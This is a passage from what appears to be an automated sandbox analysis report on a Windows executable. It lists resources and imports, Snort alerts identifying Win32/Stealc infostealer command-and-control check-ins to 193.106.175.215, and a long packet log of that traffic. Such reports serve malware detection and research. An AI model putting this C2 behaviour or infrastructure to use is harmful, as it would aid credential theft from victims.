.reloc	0x28b000	0x334e	0x3400	False	0.22723858173076922	data	2.531131235614748	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_CURSOR	0x284b78	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_CURSOR	0x285a20	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_CURSOR	0x2862c8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_CURSOR	0x286860	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_CURSOR	0x287708	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_CURSOR	0x287fb0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_CURSOR	0x288548	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0
RT_CURSOR	0x288678	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0
RT_ICON	0x26f910	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0
RT_ICON	0x26ffd8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x272580	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x272a18	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x2738c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x274168	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x2746d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x276c78	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x277d20	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x2786a8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x278b78	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x279a20	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x27a2c8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0
RT_ICON	0x27a990	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x27aef8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x27d4a0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x27e548	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x27ea18	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x27f8c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x280168	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x2806d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x282c78	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x283d20	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x2846a8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_STRING	0x288980	0x6fa	data
RT_STRING	0x289080	0x6a8	data
RT_STRING	0x289728	0x4b8	data
RT_STRING	0x289be0	0x1da	data
RT_STRING	0x289dc0	0x6ec	data
RT_GROUP_CURSOR	0x286830	0x30	data
RT_GROUP_CURSOR	0x288518	0x30	data
RT_GROUP_CURSOR	0x288728	0x22	data
RT_GROUP_ICON	0x284b10	0x68	data
RT_GROUP_ICON	0x27e9b0	0x68	data
RT_GROUP_ICON	0x2729e8	0x30	data
RT_GROUP_ICON	0x278b10	0x68	data
RT_VERSION	0x288750	0x22c	data

Imports

DLL	Import
KERNEL32.dll	AddConsoleAliasW, SleepEx, GetModuleHandleW, GetTickCount, IsBadReadPtr, GetConsoleAliasesLengthA, FreeConsole, GetVersionExW, WritePrivateProfileStructW, GetNamedPipeInfo, MulDiv, GetModuleFileNameW, CreateActCtxA, ReplaceFileA, GetStringTypeExA, CreateJobObjectA, GetProfileIntA, GetStdHandle, GetLogicalDriveStringsA, GetLastError, ReadConsoleOutputCharacterA, GetProcAddress, CancelWaitableTimer, GetLongPathNameA, VirtualAlloc, EnterCriticalSection, _hwrite, LoadLibraryA, OpenMutexA, InterlockedExchangeAdd, LocalAlloc, GetFileType, CreateFileMappingW, FindFirstVolumeMountPointW, GetNumberFormatW, CreateEventW, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, GetProcessShutdownParameters, CreateMutexA, GetFileAttributesExW, FindAtomW, EnumResourceLanguagesW, DebugBreak, FindNextVolumeA, WaitForSingleObject, GetConsoleAliasA, FindResourceW, GetCommState, AttachConsole, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, WideCharToMultiByte, SetHandleCount, DeleteCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
USER32.dll	CharLowerBuffA
GDI32.dll	GetCharWidthW, EnumFontsW, GetCharABCWidthsFloatW
ADVAPI32.dll	MapGenericMask

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.58.8.8.865323532023883 05/28/23-09:29:39.799894	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	65323	53	192.168.2.5	8.8.8.8
192.168.2.5193.106.175.21549712802044244 05/28/23-09:29:40.725978	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49712	80	192.168.2.5	193.106.175.215
192.168.2.5193.106.175.21549713802044246 05/28/23-09:29:40.856625	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49713	80	192.168.2.5	193.106.175.215
192.168.2.5193.106.175.21549711802044243 05/28/23-09:29:40.524393	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49711	80	192.168.2.5	193.106.175.215

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 28, 2023 09:29:40.457489967 CEST	49711	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.513911963 CEST	80	49711	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.514128923 CEST	49711	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.524393082 CEST	49711	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.625119925 CEST	80	49711	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.654975891 CEST	80	49711	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.655211926 CEST	49711	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.655419111 CEST	49711	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.663994074 CEST	49712	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.711527109 CEST	80	49711	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.724783897 CEST	80	49712	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.725493908 CEST	49712	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.725977898 CEST	49712	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.796806097 CEST	80	49712	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.796840906 CEST	80	49712	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.797013044 CEST	49712	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.797375917 CEST	49712	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.799499035 CEST	49713	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.855994940 CEST	80	49713	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.856226921 CEST	49713	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.856625080 CEST	49713	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.857398987 CEST	80	49712	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.922844887 CEST	80	49713	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.922888041 CEST	80	49713	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.922908068 CEST	80	49713	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.922950983 CEST	80	49713	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.922969103 CEST	80	49713	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.922985077 CEST	80	49713	193.106.175.215	192.168.2.5
May 28, 2023 09:29:40.923016071 CEST	49713	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.923089981 CEST	49713	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.924632072 CEST	49713	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:40.980309963 CEST	80	49713	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.151081085 CEST	49714	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.211818933 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.212049007 CEST	49714	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.213331938 CEST	49714	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.213427067 CEST	49714	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.273912907 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.273943901 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.273962975 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.274038076 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.274054050 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.274143934 CEST	49714	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.274194002 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.274224997 CEST	49714	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.274718046 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.274919987 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.275135040 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.275156021 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.334770918 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.334793091 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.334806919 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.334884882 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.335308075 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.392819881 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.393085003 CEST	49714	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.397425890 CEST	49714	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.407670021 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.457518101 CEST	80	49714	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.471628904 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.471885920 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.472238064 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.542838097 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.542870998 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.542895079 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.542913914 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.543057919 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.543117046 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.543560982 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.543591976 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.543622017 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.543627024 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.543649912 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.543674946 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.543821096 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.543842077 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.543867111 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.543886900 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.543984890 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.544030905 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.606288910 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606348991 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606369019 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606389999 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606410980 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606431007 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606448889 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606468916 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606513977 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.606549025 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606568098 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.606594086 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.606745958 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606767893 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606786966 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606801033 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.606808901 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606829882 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.606832027 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.606879950 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.607215881 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.607242107 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.607263088 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.607284069 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.607290983 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.607305050 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.607323885 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.607342005 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.607382059 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671047926 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671087980 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671107054 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671119928 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671133041 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671154976 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671174049 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671192884 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671215057 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671235085 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671253920 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671274900 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671297073 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671298981 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671317101 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671338081 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671346903 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671359062 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671377897 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671379089 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671400070 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671406984 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671422005 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671442032 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671444893 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671461105 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671479940 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671480894 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671500921 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671519995 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671520948 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671541929 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671560049 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671561003 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671582937 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671586037 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671602964 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671624899 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671627045 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671644926 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671663046 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671664000 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671684980 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671688080 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671705961 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671725988 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671736956 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671745062 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671763897 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671778917 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671783924 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671803951 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671804905 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671825886 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671828032 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671847105 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.671871901 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.671911955 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.735476017 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735511065 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735529900 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735543013 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735563040 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735584021 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735603094 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735621929 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735646009 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735666037 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735663891 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.735688925 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735711098 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735712051 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.735732079 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735738039 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.735754967 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735763073 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.735779047 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735800028 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735801935 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.735821962 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735835075 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.735843897 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735863924 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735872984 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.735886097 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735907078 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735908031 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.735927105 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735934019 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.735948086 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735968113 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.735971928 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.735989094 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736007929 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736010075 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736028910 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736032009 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736049891 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736069918 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736072063 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736090899 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736109018 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736112118 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736133099 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736134052 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736155033 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736164093 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736176014 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736196041 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736196995 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736216068 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736233950 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736237049 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736258030 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736274004 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736293077 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736299992 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736320019 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736320972 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736342907 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736342907 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736363888 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736366987 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736385107 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736390114 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736406088 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736414909 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736427069 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736437082 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736447096 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736458063 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736469984 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736484051 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736490011 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736504078 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736512899 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736525059 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736535072 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736553907 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736556053 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736577034 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736588001 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736597061 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736618042 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736620903 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736638069 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736658096 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736661911 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736677885 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736689091 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736700058 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736720085 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736721039 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736741066 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736752033 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736761093 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736783981 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736784935 CEST	49715	80	192.168.2.5	193.106.175.215
